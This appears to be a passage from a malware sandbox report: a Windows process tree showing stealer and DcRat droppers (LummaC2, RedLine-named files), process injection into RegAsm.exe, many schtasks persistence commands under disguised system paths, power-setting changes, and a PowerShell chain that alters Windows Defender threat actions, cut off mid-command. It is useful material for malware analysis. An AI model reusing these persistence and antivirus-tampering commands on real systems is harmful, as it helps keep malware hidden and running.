C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe"C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5952 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409133330" --session-guid=80b7b17b-5d2d-4007-baa4-e22ae69a2176 --server-tracking-blob=N2Y5NTU4NDhkYzM1NTc1NDI3NGE2ZjQ1ZTQ1ZDRkNDBjMmVhNGQ3ZDQ0YjQ3NzVhZDBmZTI0NGY1ZmVmYWQ1MTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N183ODkiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTI2Njk2MDEuMjc4NyIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N183ODkiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImZlMmU1MTZmLTJlNjctNGJlNS04YTMzLWE1ZDJhYmYyYWU3OCJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7C040000000000005⤵PID:5284
-
C:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exeC:\Users\Admin\Pictures\6UX7kX8rb3Hk51wsfjv213Kd.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2b0,0x2b4,0x120,0x2b8,0x68e1e1d0,0x68e1e1dc,0x68e1e1e86⤵PID:3012
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵PID:4916
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\assistant_installer.exe" --version5⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091333301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xdc0040,0xdc004c,0xdc00586⤵PID:6860
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"2⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\u1mg.0.exe"C:\Users\Admin\AppData\Local\Temp\u1mg.0.exe"3⤵PID:3940
-
-
C:\Users\Admin\AppData\Local\Temp\u1mg.1.exe"C:\Users\Admin\AppData\Local\Temp\u1mg.1.exe"3⤵PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"2⤵PID:4968
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3320
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:1816
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"2⤵PID:32
-
-
C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"2⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"2⤵PID:6944
-
-
C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"2⤵PID:7116
-
-
C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe"C:\Users\Admin\AppData\Local\Temp\a\RoulleteBotPro_x32-x64.exe"2⤵PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\a\random.exe"C:\Users\Admin\AppData\Local\Temp\a\random.exe"2⤵PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"2⤵PID:6224
-
-
C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"2⤵PID:6392
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"2⤵PID:6168
-
-
C:\Users\Admin\AppData\Local\Temp\a\pt.exe"C:\Users\Admin\AppData\Local\Temp\a\pt.exe"2⤵PID:7048
-
C:\Windows\system32\cmd.exe"cmd" /C tasklist3⤵PID:7136
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"2⤵PID:6616
-
-
C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe"C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe"2⤵PID:6864
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"3⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\bd2.exe"C:\Users\Admin\AppData\Local\Temp\a\bd2.exe"2⤵PID:4012
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵PID:6372
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵PID:6772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe"C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe"2⤵PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\a\un300un.exe"C:\Users\Admin\AppData\Local\Temp\a\un300un.exe"2⤵PID:5696
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵PID:1080
-
C:\Users\Admin\Pictures\rMIVpLbiJisgrNQnJ9Vmv6YA.exe"C:\Users\Admin\Pictures\rMIVpLbiJisgrNQnJ9Vmv6YA.exe"4⤵PID:1968
-
C:\Users\Admin\AppData\Local\Temp\u1io.0.exe"C:\Users\Admin\AppData\Local\Temp\u1io.0.exe"5⤵PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\u1io.1.exe"C:\Users\Admin\AppData\Local\Temp\u1io.1.exe"5⤵PID:4092
-
-
-
C:\Users\Admin\Pictures\Ub4pr6iZ3GReQXRd9QTrTTPc.exe"C:\Users\Admin\Pictures\Ub4pr6iZ3GReQXRd9QTrTTPc.exe"4⤵PID:6420
-
-
C:\Users\Admin\Pictures\NbGh0sdDmLZfWU42a9JUpJhz.exe"C:\Users\Admin\Pictures\NbGh0sdDmLZfWU42a9JUpJhz.exe"4⤵PID:5920
-
-
C:\Users\Admin\Pictures\xrW31ZdP0I0nmsoxRldrDyZ6.exe"C:\Users\Admin\Pictures\xrW31ZdP0I0nmsoxRldrDyZ6.exe"4⤵PID:6976
-
C:\Users\Admin\AppData\Local\Temp\7zSE490.tmp\Install.exe.\Install.exe /GuWwdidYfRYv "385118" /S5⤵PID:7260
-
-
-
C:\Users\Admin\Pictures\Y93gSevyBpDpU2Ci4kxm8qIs.exe"C:\Users\Admin\Pictures\Y93gSevyBpDpU2Ci4kxm8qIs.exe" --silent --allusers=04⤵PID:6680
-
C:\Users\Admin\Pictures\Y93gSevyBpDpU2Ci4kxm8qIs.exeC:\Users\Admin\Pictures\Y93gSevyBpDpU2Ci4kxm8qIs.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x69d5e1d0,0x69d5e1dc,0x69d5e1e85⤵PID:4596
-
-
-
C:\Users\Admin\Pictures\Zzj89dk4pbYH6wA1aLtdL4Kk.exe"C:\Users\Admin\Pictures\Zzj89dk4pbYH6wA1aLtdL4Kk.exe"4⤵PID:6212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\file.exe"C:\Users\Admin\AppData\Local\Temp\a\file.exe"2⤵PID:7076
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"3⤵PID:3796
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"4⤵PID:3676
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.exe"4⤵PID:5912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"2⤵PID:6232
-
-
C:\Users\Admin\AppData\Local\Temp\a\appdata.exe"C:\Users\Admin\AppData\Local\Temp\a\appdata.exe"2⤵PID:2604
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
C:\Windows\svchost.exeC:\Windows\svchost.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4228 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA023.tmp.bat""2⤵PID:4028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5752
-
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:5116
-
-
-
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"1⤵
- Executes dropped EXE
PID:1856 -
C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4740
-
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:5316
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegAsmR" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\RegAsm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "new1n" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\new1.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "new1" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\new1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "new1n" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\new1.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 6 /tr "'C:\Windows\ModemLogs\Jufrxnb.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Jufrxnb" /sc ONLOGON /tr "'C:\Windows\ModemLogs\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 12 /tr "'C:\Windows\ModemLogs\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\Performance\WinSAT\DataStore\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1496
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\Jufrxnb.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Jufrxnb" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4968
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "JufrxnbJ" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Portable Devices\Jufrxnb.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Adobe\sysmon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Adobe\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Music\fontdrvhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:500
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Music\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6048
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Music\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitychecks" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\iolo\securitycheck.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitycheck" /sc ONLOGON /tr "'C:\Users\All Users\iolo\securitycheck.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5788
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "securitychecks" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\iolo\securitycheck.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crypted_33cb9091c" /sc MINUTE /mo 5 /tr "'C:\BlockComponentwebMonitordhcp\crypted_33cb9091.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crypted_33cb9091" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\crypted_33cb9091.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "crypted_33cb9091c" /sc MINUTE /mo 14 /tr "'C:\BlockComponentwebMonitordhcp\crypted_33cb9091.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\agentDllDhcp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1304
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcp" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\june.tmp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmp" /sc ONLOGON /tr "'C:\Users\Default User\june.tmp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5592
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "june.tmpj" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\june.tmp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5728
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ttt01t" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\ttt01.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2832
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ttt01" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\ttt01.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1272
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ttt01t" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\ttt01.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1076
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\agentDllDhcp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcp" /sc ONLOGON /tr "'C:\Users\Admin\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "agentDllDhcpa" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\agentDllDhcp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5408
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵
- Executes dropped EXE
PID:4848
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵
- Suspicious use of SetThreadContext
PID:4492 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵PID:4820
-
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵PID:264
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f2⤵PID:4112
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵
- DcRat
- Creates scheduled task(s)
PID:5500
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"2⤵PID:284
-
-
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exeC:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe1⤵PID:5248
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:1416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:2736
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4488
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:5088
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5224
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:2832
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3981⤵PID:5788
-
C:\Users\Admin\AppData\Roaming\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive.exe1⤵PID:6092
-
C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exeC:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe1⤵PID:4916
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe2⤵PID:5544
-
-
C:\Windows\system32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"2⤵PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\7zS5DD1.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS5DD1.tmp\Install.exe mP /odsite_idGKS 385118 /S1⤵PID:6200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD 